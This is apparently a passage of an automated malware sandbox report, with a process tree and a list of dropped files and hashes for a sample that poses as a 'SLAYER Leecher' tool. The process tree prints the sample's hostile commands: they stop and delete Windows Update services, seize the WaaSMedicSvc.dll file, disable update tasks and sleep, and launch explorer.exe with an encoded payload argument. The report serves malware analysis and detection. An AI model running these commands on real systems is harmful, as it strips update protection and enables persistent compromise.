"\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                      3⤵
                                        PID:406952
                                        • C:\Windows\system32\sc.exe
                                          sc stop UsoSvc
                                          4⤵
                                          • Launches sc.exe
                                          PID:407084
                                        • C:\Windows\system32\sc.exe
                                          sc stop WaaSMedicSvc
                                          4⤵
                                          • Launches sc.exe
                                          PID:407104
                                        • C:\Windows\system32\sc.exe
                                          sc stop wuauserv
                                          4⤵
                                          • Launches sc.exe
                                          PID:407136
                                        • C:\Windows\system32\sc.exe
                                          sc stop bits
                                          4⤵
                                          • Launches sc.exe
                                          PID:407160
                                        • C:\Windows\system32\sc.exe
                                          sc stop dosvc
                                          4⤵
                                          • Launches sc.exe
                                          PID:407176
                                        • C:\Windows\system32\reg.exe
                                          reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
                                          4⤵
                                          • Modifies registry key
                                          PID:407216
                                        • C:\Windows\system32\reg.exe
                                          reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
                                          4⤵
                                          • Modifies registry key
                                          PID:407260
                                        • C:\Windows\system32\reg.exe
                                          reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
                                          4⤵
                                          • Modifies registry key
                                          PID:407308
                                        • C:\Windows\system32\reg.exe
                                          reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
                                          4⤵
                                          • Modifies registry key
                                          PID:407384
                                        • C:\Windows\system32\reg.exe
                                          reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
                                          4⤵
                                          • Modifies registry key
                                          PID:407396
                                        • C:\Windows\system32\takeown.exe
                                          takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                                          4⤵
                                          • Possible privilege escalation attempt
                                          • Modifies file permissions
                                          PID:407412
                                        • C:\Windows\system32\icacls.exe
                                          icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
                                          4⤵
                                          • Possible privilege escalation attempt
                                          • Modifies file permissions
                                          PID:407428
                                        • C:\Windows\system32\reg.exe
                                          reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
                                          4⤵
                                          • Modifies registry key
                                          PID:407448
                                        • C:\Windows\system32\reg.exe
                                          reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
                                          4⤵
                                          • Modifies registry key
                                          PID:407480
                                        • C:\Windows\system32\reg.exe
                                          reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                                          4⤵
                                          • Modifies registry key
                                          PID:407464
                                        • C:\Windows\system32\schtasks.exe
                                          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
                                          4⤵
                                            PID:407508
                                          • C:\Windows\system32\schtasks.exe
                                            SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
                                            4⤵
                                              PID:407524
                                            • C:\Windows\system32\reg.exe
                                              reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
                                              4⤵
                                              • Modifies registry key
                                              PID:407496
                                            • C:\Windows\system32\schtasks.exe
                                              SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                                              4⤵
                                                PID:407540
                                              • C:\Windows\system32\schtasks.exe
                                                SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                                                4⤵
                                                  PID:407576
                                                • C:\Windows\system32\schtasks.exe
                                                  SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                                                  4⤵
                                                    PID:407560
                                                  • C:\Windows\system32\schtasks.exe
                                                    SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                                                    4⤵
                                                      PID:407592
                                                    • C:\Windows\system32\schtasks.exe
                                                      SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                                      4⤵
                                                        PID:407608
                                                    • C:\Windows\System32\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                                      3⤵
                                                        PID:407000
                                                        • C:\Windows\system32\powercfg.exe
                                                          powercfg /x -hibernate-timeout-ac 0
                                                          4⤵
                                                            PID:407060
                                                          • C:\Windows\system32\powercfg.exe
                                                            powercfg /x -hibernate-timeout-dc 0
                                                            4⤵
                                                              PID:407120
                                                            • C:\Windows\system32\powercfg.exe
                                                              powercfg /x -standby-timeout-ac 0
                                                              4⤵
                                                                PID:407148
                                                              • C:\Windows\system32\powercfg.exe
                                                                powercfg /x -standby-timeout-dc 0
                                                                4⤵
                                                                  PID:407188
                                                              • C:\Windows\System32\conhost.exe
                                                                C:\Windows\System32\conhost.exe "czellrako"
                                                                3⤵
                                                                  PID:407196
                                                                • C:\Windows\explorer.exe
                                                                  C:\Windows\explorer.exe jeqriwesihy0 6E3sjfZq2rJQaxvLPmXgsA4f0StS9pic9Xw++oZ1mnbMNdSoXP4ts/KtNDhUPQkUXlyRZJXfJ5jiUwUr70AdCyDrkXUCGxfaV7s5kUsZ+M1jVBG7HUoq3EW6fYKxH5NP4M/tJ5/ZYtZM8EaX7F4M1t4UqpeucUZmwfkmLZunjXCsSyauoBJ4rCG2oWXgj+Mz1zn2/P6IvUiafyirYGJKq8C8Iyup27uke/hMzGar6avUzI4/Z1ZzYHHRT2ftkfrbrs42vCUVG1IbR8ZRcBC7Ao1zzvE5vXpY+VDlFfWGw15+M4nLexWOgOQVDDXZHeBpBgCj/w14IFN+FCTB6Al2NU86G5mCiX/+Uva7D8nJ2J1qLfiLlgpq/TvEYsAmX13t7wFi8BmicCdeYIniJ5DuJ7/iSaAZjUWWsZcGrXkQ2q/DfFYSw7GJUOukQkwOn40Ov8Ppyj+EQMrqmv3xPWDgiT5i5hP9N3bTWIlcHomC2uF2fR+my2wEys4OMviDWX52ANyfC7G7+Ud0EwdkbDAR64ybIsjuTmWts7p3aJRnhA27Lsuardo/7QJSF8ruzlRPbaWiNFLjOBolT+POpzyDSTxa3PWNfNB0QoyyNsg2goUHznkS33VEQSKMJUoZCIarJvcPMNQhStPuWbYNkeFVD8M6caD0NBWw3sazM2UjOhU=
                                                                  3⤵
                                                                  • Modifies data under HKEY_USERS
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  PID:407316

                                                            Network

                                                            MITRE ATT&CK Enterprise v6

                                                            Replay Monitor

                                                            Loading Replay Monitor...

                                                            Downloads

                                                            • C:\Program Files\Google\Chrome\updater.exe

                                                              Filesize

                                                              4.1MB

                                                              MD5

                                                              d80a837c05b2d5e7a01a88c4c0b732c2

                                                              SHA1

                                                              b8f19db24542d475a6c1fe6df7af90e5c8695e9a

                                                              SHA256

                                                              471028f0fac064ea991379d4302b219750884fed5564be404eeca4824c5825a8

                                                              SHA512

                                                              fed76343ef08d4e9eb496c2b77c3f949a5868ce1a76ace0ec9116d8b22ad7eb3e12ed704fbb8de8f742e20d954e0bdc0bc51553be7f1d6522b9d58ce84db3632

                                                            • C:\Program Files\Google\Chrome\updater.exe

                                                              Filesize

                                                              4.1MB

                                                              MD5

                                                              d80a837c05b2d5e7a01a88c4c0b732c2

                                                              SHA1

                                                              b8f19db24542d475a6c1fe6df7af90e5c8695e9a

                                                              SHA256

                                                              471028f0fac064ea991379d4302b219750884fed5564be404eeca4824c5825a8

                                                              SHA512

                                                              fed76343ef08d4e9eb496c2b77c3f949a5868ce1a76ace0ec9116d8b22ad7eb3e12ed704fbb8de8f742e20d954e0bdc0bc51553be7f1d6522b9d58ce84db3632

                                                            • C:\ProgramData\GeForce\Lib\COM Surrogate.exe

                                                              Filesize

                                                              4.9MB

                                                              MD5

                                                              73b3415f513dd2718229b7ba87defee8

                                                              SHA1

                                                              fadd7a2619bee020339ca90ea65ba31eb3e8714f

                                                              SHA256

                                                              8fffbbfcd9ecea90252eed7fb2426c07e801eceb3eccfa660de98789b5cf423c

                                                              SHA512

                                                              7a6a791b14a8eade61c3d645e66acdef015ef515d4a7325b3eba1d0db22ae5b759651a86650b27c5162dbf7d7167cc4e229ceb079eae96b68a3fed48b0a8eb03

                                                            • C:\ProgramData\GeForce\Lib\COM Surrogate.exe

                                                              Filesize

                                                              4.9MB

                                                              MD5

                                                              73b3415f513dd2718229b7ba87defee8

                                                              SHA1

                                                              fadd7a2619bee020339ca90ea65ba31eb3e8714f

                                                              SHA256

                                                              8fffbbfcd9ecea90252eed7fb2426c07e801eceb3eccfa660de98789b5cf423c

                                                              SHA512

                                                              7a6a791b14a8eade61c3d645e66acdef015ef515d4a7325b3eba1d0db22ae5b759651a86650b27c5162dbf7d7167cc4e229ceb079eae96b68a3fed48b0a8eb03

                                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v2.0\UsageLogs\Setup.exe.log

                                                              Filesize

                                                              408B

                                                              MD5

                                                              8e1e19a5abcce21f8a12921d6a2eeeee

                                                              SHA1

                                                              b5704368dfd8fc7aeafb15c23b69895e809fe20e

                                                              SHA256

                                                              22cf24d10cc11a9bb23268f18afbc8f3481c27e1feb4cb42ba5c8775e12720e3

                                                              SHA512

                                                              48365f858592d677ef5d0e2948f672234898e47a153eec32592a2e079353702a64e41e1aa59250f05bd690690b9edfb8455dfac90c6695fb7c0b6907a057fe78

                                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v2.0\UsageLogs\svchost.exe.log

                                                              Filesize

                                                              588B

                                                              MD5

                                                              2f142977932b7837fa1cc70278e53361

                                                              SHA1

                                                              0a3212d221079671bfdeee176ad841e6f15904fc

                                                              SHA256

                                                              961ca2c0e803a7201adb3b656ed3abafc259d6d376e8ade66f0afff10a564820

                                                              SHA512

                                                              a25e45e41933902bcc0ea38b4daa64e96cbcd8900b446e1326cffb8c91eb1886b1e90686190bdba30d7014490001a732f91f2869bb9987c0213a8d798c7b3421

                                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                              Filesize

                                                              2KB

                                                              MD5

                                                              d85ba6ff808d9e5444a4b369f5bc2730

                                                              SHA1

                                                              31aa9d96590fff6981b315e0b391b575e4c0804a

                                                              SHA256

                                                              84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                              SHA512

                                                              8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AppLaunch.exe.log

                                                              Filesize

                                                              2KB

                                                              MD5

                                                              89531cbc3cd8383d77c234df19aaef72

                                                              SHA1

                                                              e3ebc9f197f60d2a1ad7b5d3c8d304cb864aa205

                                                              SHA256

                                                              c4526381de08d8b162de45550d19ed7dd29405748e99f70a21b25e53f64cc2c3

                                                              SHA512

                                                              e40a9c41b4d3915975a396a63b1ef1e69b28f306f04287f86208d86dfcb9b4cd642a6228f5e181b9a77482c2b7015095084936afb88514f01937446df3a7fe4a

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                              Filesize

                                                              18KB

                                                              MD5

                                                              9adf8be3bebca98e218a6953852abcb0

                                                              SHA1

                                                              641c487120810c3aadf5e7283a02ff346175ba68

                                                              SHA256

                                                              097828e06560259be0d3a409a7cf6cca0bfba478c23bd225d14f34c99b60046d

                                                              SHA512

                                                              a5f6ccc8bdc7f29a8a0866b7a3d63712ebe5d2e11e9cb974ca2aad86af367e0d553298c8dcc4a132172f68375185ff6fcebbb33677aa813e9e108cb6b5ff2dd8

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                              Filesize

                                                              18KB

                                                              MD5

                                                              9adf8be3bebca98e218a6953852abcb0

                                                              SHA1

                                                              641c487120810c3aadf5e7283a02ff346175ba68

                                                              SHA256

                                                              097828e06560259be0d3a409a7cf6cca0bfba478c23bd225d14f34c99b60046d

                                                              SHA512

                                                              a5f6ccc8bdc7f29a8a0866b7a3d63712ebe5d2e11e9cb974ca2aad86af367e0d553298c8dcc4a132172f68375185ff6fcebbb33677aa813e9e108cb6b5ff2dd8

                                                            • C:\Users\Admin\AppData\Local\Temp\$inst\2.tmp

                                                              Filesize

                                                              36B

                                                              MD5

                                                              8708699d2c73bed30a0a08d80f96d6d7

                                                              SHA1

                                                              684cb9d317146553e8c5269c8afb1539565f4f78

                                                              SHA256

                                                              a32e0a83001d2c5d41649063217923dac167809cab50ec5784078e41c9ec0f0f

                                                              SHA512

                                                              38ece3e441cc5d8e97781801d5b19bdede6065a0a50f7f87337039edeeb4a22ad0348e9f5b5542b26236037dd35d0563f62d7f4c4f991c51020552cfae03b264

                                                            • C:\Users\Admin\AppData\Local\Temp\$inst\2.tmp

                                                              Filesize

                                                              36B

                                                              MD5

                                                              8708699d2c73bed30a0a08d80f96d6d7

                                                              SHA1

                                                              684cb9d317146553e8c5269c8afb1539565f4f78

                                                              SHA256

                                                              a32e0a83001d2c5d41649063217923dac167809cab50ec5784078e41c9ec0f0f

                                                              SHA512

                                                              38ece3e441cc5d8e97781801d5b19bdede6065a0a50f7f87337039edeeb4a22ad0348e9f5b5542b26236037dd35d0563f62d7f4c4f991c51020552cfae03b264

                                                            • C:\Users\Admin\AppData\Local\Temp\1.exe

                                                              Filesize

                                                              111KB

                                                              MD5

                                                              dab5342d0d566bc7d80e1cc11459912e

                                                              SHA1

                                                              7cd1a45da9458278571b13f08b28f607093e1225

                                                              SHA256

                                                              fa6ed407a949b1da6c2123ef67ef53280c4bb02bde373c62cad3ae228b5a4dd1

                                                              SHA512

                                                              0ccb2bc126d3a9e4af8cc022d93db95a9b542beb488bc23f55ade60cf7a5437657a9a0095cb4b8f56408fb75eddcb8d80a1c7ba2e658a889c57762d8d3f77d72

                                                            • C:\Users\Admin\AppData\Local\Temp\1.exe

                                                              Filesize

                                                              111KB

                                                              MD5

                                                              dab5342d0d566bc7d80e1cc11459912e

                                                              SHA1

                                                              7cd1a45da9458278571b13f08b28f607093e1225

                                                              SHA256

                                                              fa6ed407a949b1da6c2123ef67ef53280c4bb02bde373c62cad3ae228b5a4dd1

                                                              SHA512

                                                              0ccb2bc126d3a9e4af8cc022d93db95a9b542beb488bc23f55ade60cf7a5437657a9a0095cb4b8f56408fb75eddcb8d80a1c7ba2e658a889c57762d8d3f77d72

                                                            • C:\Users\Admin\AppData\Local\Temp\10.exe

                                                              Filesize

                                                              413KB

                                                              MD5

                                                              5998150187408a1d1da9090a8cbf4a6d

                                                              SHA1

                                                              d764bab45313e96d050c43c2c476d28baa2c1eaf

                                                              SHA256

                                                              8fb31b017a281212c5246fd1aad185548aee1ada35574b3758439d8921f24626

                                                              SHA512

                                                              83540bc89b1ac0d2ce1423e675c8781f326fb9fc9188e5545ba13ba52d8e376a98e6768b5f349e6df481745426c6cf62ead4d2aee5ea280634faaeedf4ca60cb

                                                            • C:\Users\Admin\AppData\Local\Temp\10.exe

                                                              Filesize

                                                              413KB

                                                              MD5

                                                              5998150187408a1d1da9090a8cbf4a6d

                                                              SHA1

                                                              d764bab45313e96d050c43c2c476d28baa2c1eaf

                                                              SHA256

                                                              8fb31b017a281212c5246fd1aad185548aee1ada35574b3758439d8921f24626

                                                              SHA512

                                                              83540bc89b1ac0d2ce1423e675c8781f326fb9fc9188e5545ba13ba52d8e376a98e6768b5f349e6df481745426c6cf62ead4d2aee5ea280634faaeedf4ca60cb

                                                            • C:\Users\Admin\AppData\Local\Temp\11.exe

                                                              Filesize

                                                              1.4MB

                                                              MD5

                                                              00854e47bc6249cefca953ddc3f20f48

                                                              SHA1

                                                              fbec3af2ab8c29e660c86ecbf5d1c0ca7a33163d

                                                              SHA256

                                                              981b59093b5e83b9956e1a191e763352ba8f270cc2e73fe1b0b172139469a1fa

                                                              SHA512

                                                              1ed70afc8d7b4cc4c12c1a6e7935363caf939b4621ed26397d03eac56d8ef572dda71f3760bd84ece02f9c06f8435c330cf5dad950b56ff4f789a9eafa1ae119

                                                            • C:\Users\Admin\AppData\Local\Temp\11.exe

                                                              Filesize

                                                              1.4MB

                                                              MD5

                                                              00854e47bc6249cefca953ddc3f20f48

                                                              SHA1

                                                              fbec3af2ab8c29e660c86ecbf5d1c0ca7a33163d

                                                              SHA256

                                                              981b59093b5e83b9956e1a191e763352ba8f270cc2e73fe1b0b172139469a1fa

                                                              SHA512

                                                              1ed70afc8d7b4cc4c12c1a6e7935363caf939b4621ed26397d03eac56d8ef572dda71f3760bd84ece02f9c06f8435c330cf5dad950b56ff4f789a9eafa1ae119

                                                            • C:\Users\Admin\AppData\Local\Temp\2.exe

                                                              Filesize

                                                              1.4MB

                                                              MD5

                                                              9bda451a29ccd4791cf8ac5c240e8048

                                                              SHA1

                                                              7ecded8397484e5b4cfcad8fdbe167bb1af2b11f

                                                              SHA256

                                                              a7f3ec78e6e5b53b6b8206074895b5832649c64f07bb1b55c3a1c2c9144a7635

                                                              SHA512

                                                              acda727d50b14932cacdfd476d98ba93426f681331d910ea9df97458c6d4d2848bee669b1e62f1476e94050447e1b7d9b62e6542f5ed511f91b0516e62fe880c

                                                            • C:\Users\Admin\AppData\Local\Temp\2.exe

                                                              Filesize

                                                              1.4MB

                                                              MD5

                                                              9bda451a29ccd4791cf8ac5c240e8048

                                                              SHA1

                                                              7ecded8397484e5b4cfcad8fdbe167bb1af2b11f

                                                              SHA256

                                                              a7f3ec78e6e5b53b6b8206074895b5832649c64f07bb1b55c3a1c2c9144a7635

                                                              SHA512

                                                              acda727d50b14932cacdfd476d98ba93426f681331d910ea9df97458c6d4d2848bee669b1e62f1476e94050447e1b7d9b62e6542f5ed511f91b0516e62fe880c

                                                            • C:\Users\Admin\AppData\Local\Temp\3.exe

                                                              Filesize

                                                              4.9MB

                                                              MD5

                                                              43e86612f2667d3df11c97c2aacadc97

                                                              SHA1

                                                              6e3b37c580840dd44444b249941e98fd1b49852c

                                                              SHA256

                                                              d66ac4afb7574c2ee7f6a824b9b2f8eb505a2dcc00cb6790863493b6d1568591

                                                              SHA512

                                                              0479701ee351e11af34c816ab514715219660de59f9e7f37a264417b1e968896f5eef8cac4463586eb9b4994d245791cb7edf901f463f2165b8f1320930e1df0

                                                            • C:\Users\Admin\AppData\Local\Temp\3.exe

                                                              Filesize

                                                              4.9MB

                                                              MD5

                                                              43e86612f2667d3df11c97c2aacadc97

                                                              SHA1

                                                              6e3b37c580840dd44444b249941e98fd1b49852c

                                                              SHA256

                                                              d66ac4afb7574c2ee7f6a824b9b2f8eb505a2dcc00cb6790863493b6d1568591

                                                              SHA512

                                                              0479701ee351e11af34c816ab514715219660de59f9e7f37a264417b1e968896f5eef8cac4463586eb9b4994d245791cb7edf901f463f2165b8f1320930e1df0

                                                            • C:\Users\Admin\AppData\Local\Temp\5.exe

                                                              Filesize

                                                              95KB

                                                              MD5

                                                              af8a3a1cb685f9e1fdcc970bd4ca420f

                                                              SHA1

                                                              9342d6f660df293516c2932c905fe4411474e321

                                                              SHA256

                                                              39d7aead40f62566713de4ad6f430c06973fda6da972748f982a3d75f23715a9

                                                              SHA512

                                                              04864f3c6d4447694d4d4e4d5722302b13a41827d33fd3390fdc2e2c5f3dc8169bab0781099c79f0cb7b6af6d0b4870a3b226ab92ef37b62cca0aa86e00f4186

                                                            • C:\Users\Admin\AppData\Local\Temp\5.exe

                                                              Filesize

                                                              95KB

                                                              MD5

                                                              af8a3a1cb685f9e1fdcc970bd4ca420f

                                                              SHA1

                                                              9342d6f660df293516c2932c905fe4411474e321

                                                              SHA256

                                                              39d7aead40f62566713de4ad6f430c06973fda6da972748f982a3d75f23715a9

                                                              SHA512

                                                              04864f3c6d4447694d4d4e4d5722302b13a41827d33fd3390fdc2e2c5f3dc8169bab0781099c79f0cb7b6af6d0b4870a3b226ab92ef37b62cca0aa86e00f4186

                                                            • C:\Users\Admin\AppData\Local\Temp\6.exe

                                                              Filesize

                                                              4.1MB

                                                              MD5

                                                              d80a837c05b2d5e7a01a88c4c0b732c2

                                                              SHA1

                                                              b8f19db24542d475a6c1fe6df7af90e5c8695e9a

                                                              SHA256

                                                              471028f0fac064ea991379d4302b219750884fed5564be404eeca4824c5825a8

                                                              SHA512

                                                              fed76343ef08d4e9eb496c2b77c3f949a5868ce1a76ace0ec9116d8b22ad7eb3e12ed704fbb8de8f742e20d954e0bdc0bc51553be7f1d6522b9d58ce84db3632

                                                            • C:\Users\Admin\AppData\Local\Temp\6.exe

                                                              Filesize

                                                              4.1MB

                                                              MD5

                                                              d80a837c05b2d5e7a01a88c4c0b732c2

                                                              SHA1

                                                              b8f19db24542d475a6c1fe6df7af90e5c8695e9a

                                                              SHA256

                                                              471028f0fac064ea991379d4302b219750884fed5564be404eeca4824c5825a8

                                                              SHA512

                                                              fed76343ef08d4e9eb496c2b77c3f949a5868ce1a76ace0ec9116d8b22ad7eb3e12ed704fbb8de8f742e20d954e0bdc0bc51553be7f1d6522b9d58ce84db3632

                                                            • C:\Users\Admin\AppData\Local\Temp\7.exe

                                                              Filesize

                                                              2.4MB

                                                              MD5

                                                              7612d86c7e4b0d6624a1387da41c18ee

                                                              SHA1

                                                              aef37933ce24a135f0f84d09351b852f09ea1e58

                                                              SHA256

                                                              761466bbd912ee25f7303102c251f50955f15535758becdee8f4afed1eb358cb

                                                              SHA512

                                                              e2fe5f95b691c5923eb3413cda4f3bdc9712f1962ca232a1a765f98d21bcc86d4a2fe56cc40841f989ec981e7c68aeba0ed3fa9c151d5f15403a54befbc9cfa0

                                                            • C:\Users\Admin\AppData\Local\Temp\7.exe

                                                              Filesize

                                                              2.4MB

                                                              MD5

                                                              7612d86c7e4b0d6624a1387da41c18ee

                                                              SHA1

                                                              aef37933ce24a135f0f84d09351b852f09ea1e58

                                                              SHA256

                                                              761466bbd912ee25f7303102c251f50955f15535758becdee8f4afed1eb358cb

                                                              SHA512

                                                              e2fe5f95b691c5923eb3413cda4f3bdc9712f1962ca232a1a765f98d21bcc86d4a2fe56cc40841f989ec981e7c68aeba0ed3fa9c151d5f15403a54befbc9cfa0

                                                            • C:\Users\Admin\AppData\Local\Temp\8.exe

                                                              Filesize

                                                              367KB

                                                              MD5

                                                              50e064b49ae012894a53fe30dac655d6

                                                              SHA1

                                                              19181a85a5d89d32cd8716b15b9160336168d273

                                                              SHA256

                                                              fac1c9a5d8f1c7999b69ba9746762cf8ce45c4bb961d1e973a657bbf4751bbb0

                                                              SHA512

                                                              4c766a3f4ab7e6a3d5d161ecc8d5e78183a3abf377ca3e7b27efba68a384be1b8a32c61f1ed0ca2333e90d1b9aa43224aeb9e4aa13fe813c00a58f380623a8ef

                                                            • C:\Users\Admin\AppData\Local\Temp\8.exe

                                                              Filesize

                                                              367KB

                                                              MD5

                                                              50e064b49ae012894a53fe30dac655d6

                                                              SHA1

                                                              19181a85a5d89d32cd8716b15b9160336168d273

                                                              SHA256

                                                              fac1c9a5d8f1c7999b69ba9746762cf8ce45c4bb961d1e973a657bbf4751bbb0

                                                              SHA512

                                                              4c766a3f4ab7e6a3d5d161ecc8d5e78183a3abf377ca3e7b27efba68a384be1b8a32c61f1ed0ca2333e90d1b9aa43224aeb9e4aa13fe813c00a58f380623a8ef

                                                            • C:\Users\Admin\AppData\Local\Temp\9.exe

                                                              Filesize

                                                              2.5MB

                                                              MD5

                                                              6cabeda725dedf18f07565dd8ce222fd

                                                              SHA1

                                                              e42cc2c0cf55c603f322677b5008da0e9752d30e

                                                              SHA256

                                                              7a6559eaa68cba0fdc1f101ab6c294e5c4205a6134fd9bb442eef2a49d700bbf

                                                              SHA512

                                                              2050ae6204b8adaae332a678fc866c2638b1f08a6d7e72301aa6306164c415bfacf7f9b8cd93f532c3901b58a51c554c3a90039dfd839ad5994dca1e2e18c947

                                                            • C:\Users\Admin\AppData\Local\Temp\9.exe

                                                              Filesize

                                                              2.5MB

                                                              MD5

                                                              6cabeda725dedf18f07565dd8ce222fd

                                                              SHA1

                                                              e42cc2c0cf55c603f322677b5008da0e9752d30e

                                                              SHA256

                                                              7a6559eaa68cba0fdc1f101ab6c294e5c4205a6134fd9bb442eef2a49d700bbf

                                                              SHA512

                                                              2050ae6204b8adaae332a678fc866c2638b1f08a6d7e72301aa6306164c415bfacf7f9b8cd93f532c3901b58a51c554c3a90039dfd839ad5994dca1e2e18c947

                                                            • C:\Users\Admin\AppData\Local\Temp\SLAYER Leecher v0.7 .exe

                                                              Filesize

                                                              6.6MB

                                                              MD5

                                                              aa0b6211f5245f25392b74fdbab048eb

                                                              SHA1

                                                              05c37446aca08847a2688257d0fb138f560b4db2

                                                              SHA256

                                                              74cb827e0324e02bae1b2632b624ff84bd4bd54b796bb046fa27f557ca8f8674

                                                              SHA512

                                                              97e44da681f5b7db132cd37b1a6305f45d5ec546a23ae3f55f8a8cd214e5c76d22947d12a844767c88fc1844f297f7ce7a85569859286b3b5816144979d05176

                                                            • C:\Users\Admin\AppData\Local\Temp\SLAYER Leecher v0.7 .exe

                                                              Filesize

                                                              6.6MB

                                                              MD5

                                                              aa0b6211f5245f25392b74fdbab048eb

                                                              SHA1

                                                              05c37446aca08847a2688257d0fb138f560b4db2

                                                              SHA256

                                                              74cb827e0324e02bae1b2632b624ff84bd4bd54b796bb046fa27f557ca8f8674

                                                              SHA512

                                                              97e44da681f5b7db132cd37b1a6305f45d5ec546a23ae3f55f8a8cd214e5c76d22947d12a844767c88fc1844f297f7ce7a85569859286b3b5816144979d05176

                                                            • C:\Users\Admin\AppData\Local\Temp\Setup.exe

                                                              Filesize

                                                              460KB

                                                              MD5

                                                              dc3253da7448ba2a2e62a20b45e14217

                                                              SHA1

                                                              5341b88dde807c9412b43631bb55d3890d499dce

                                                              SHA256

                                                              0d347b51123738a7c9c654da232bb07e7cc542dba9006123009fc46bc5386230

                                                              SHA512

                                                              547050db96aab0a8ee826de752174f98e2e9bbd3782a6cff1584491aac9ba7ace83bc214af65b12032a0aa390b90c4fb18607945631ffa71d9567cdd75adbdbf

                                                            • C:\Users\Admin\AppData\Local\Temp\Setup.exe

                                                              Filesize

                                                              460KB

                                                              MD5

                                                              dc3253da7448ba2a2e62a20b45e14217

                                                              SHA1

                                                              5341b88dde807c9412b43631bb55d3890d499dce

                                                              SHA256

                                                              0d347b51123738a7c9c654da232bb07e7cc542dba9006123009fc46bc5386230

                                                              SHA512

                                                              547050db96aab0a8ee826de752174f98e2e9bbd3782a6cff1584491aac9ba7ace83bc214af65b12032a0aa390b90c4fb18607945631ffa71d9567cdd75adbdbf

                                                            • C:\Users\Admin\AppData\Local\Temp\Setup.exe

                                                              Filesize

                                                              460KB

                                                              MD5

                                                              dc3253da7448ba2a2e62a20b45e14217

                                                              SHA1

                                                              5341b88dde807c9412b43631bb55d3890d499dce

                                                              SHA256

                                                              0d347b51123738a7c9c654da232bb07e7cc542dba9006123009fc46bc5386230

                                                              SHA512

                                                              547050db96aab0a8ee826de752174f98e2e9bbd3782a6cff1584491aac9ba7ace83bc214af65b12032a0aa390b90c4fb18607945631ffa71d9567cdd75adbdbf

                                                            • C:\Users\Admin\AppData\Local\Temp\tmp10B4.tmp.bat

                                                              Filesize

                                                              159B

                                                              MD5

                                                              299531937053b0947c36c01468a2f244

                                                              SHA1

                                                              e157bce2e63e8b5afb642a7724571e1296b34433

                                                              SHA256

                                                              00b768ad22c51fe747b2cb6b327cda34798ed6cb7a4a5b3dc816202086b020e0

                                                              SHA512

                                                              d8a4f07b046eb50e699d4de2bd2923f51a9efe5d86f54ecfa9a9d46c13a532e070333769124c97567db865eec83eef4fe4de9aebff70a7d134c050d4ad15d0ce

                                                            • C:\Users\Admin\AppData\Local\Temp\v0.7.exe

                                                              Filesize

                                                              7.1MB

                                                              MD5

                                                              4fb5fe2d1c634048f57951fac1119c70

                                                              SHA1

                                                              ac212f208ea3e99e868f2846ece0ac5bfc5f1ad0

                                                              SHA256

                                                              c3196cefb0a5baa235a5ce3205f13650d80d918e5c5b44850dbf6bf87dd42f7b

                                                              SHA512

                                                              0582955b826945d6a6b971192b7560bacc514dc8adee493cb93a6634285d8cf011ca9a8d4d987cff2c2543d91331fbce451f488cb97f52d99264207d5dc667aa

                                                            • C:\Users\Admin\AppData\Local\Temp\v0.7.exe

                                                              Filesize

                                                              7.1MB

                                                              MD5

                                                              4fb5fe2d1c634048f57951fac1119c70

                                                              SHA1

                                                              ac212f208ea3e99e868f2846ece0ac5bfc5f1ad0

                                                              SHA256

                                                              c3196cefb0a5baa235a5ce3205f13650d80d918e5c5b44850dbf6bf87dd42f7b

                                                              SHA512

                                                              0582955b826945d6a6b971192b7560bacc514dc8adee493cb93a6634285d8cf011ca9a8d4d987cff2c2543d91331fbce451f488cb97f52d99264207d5dc667aa

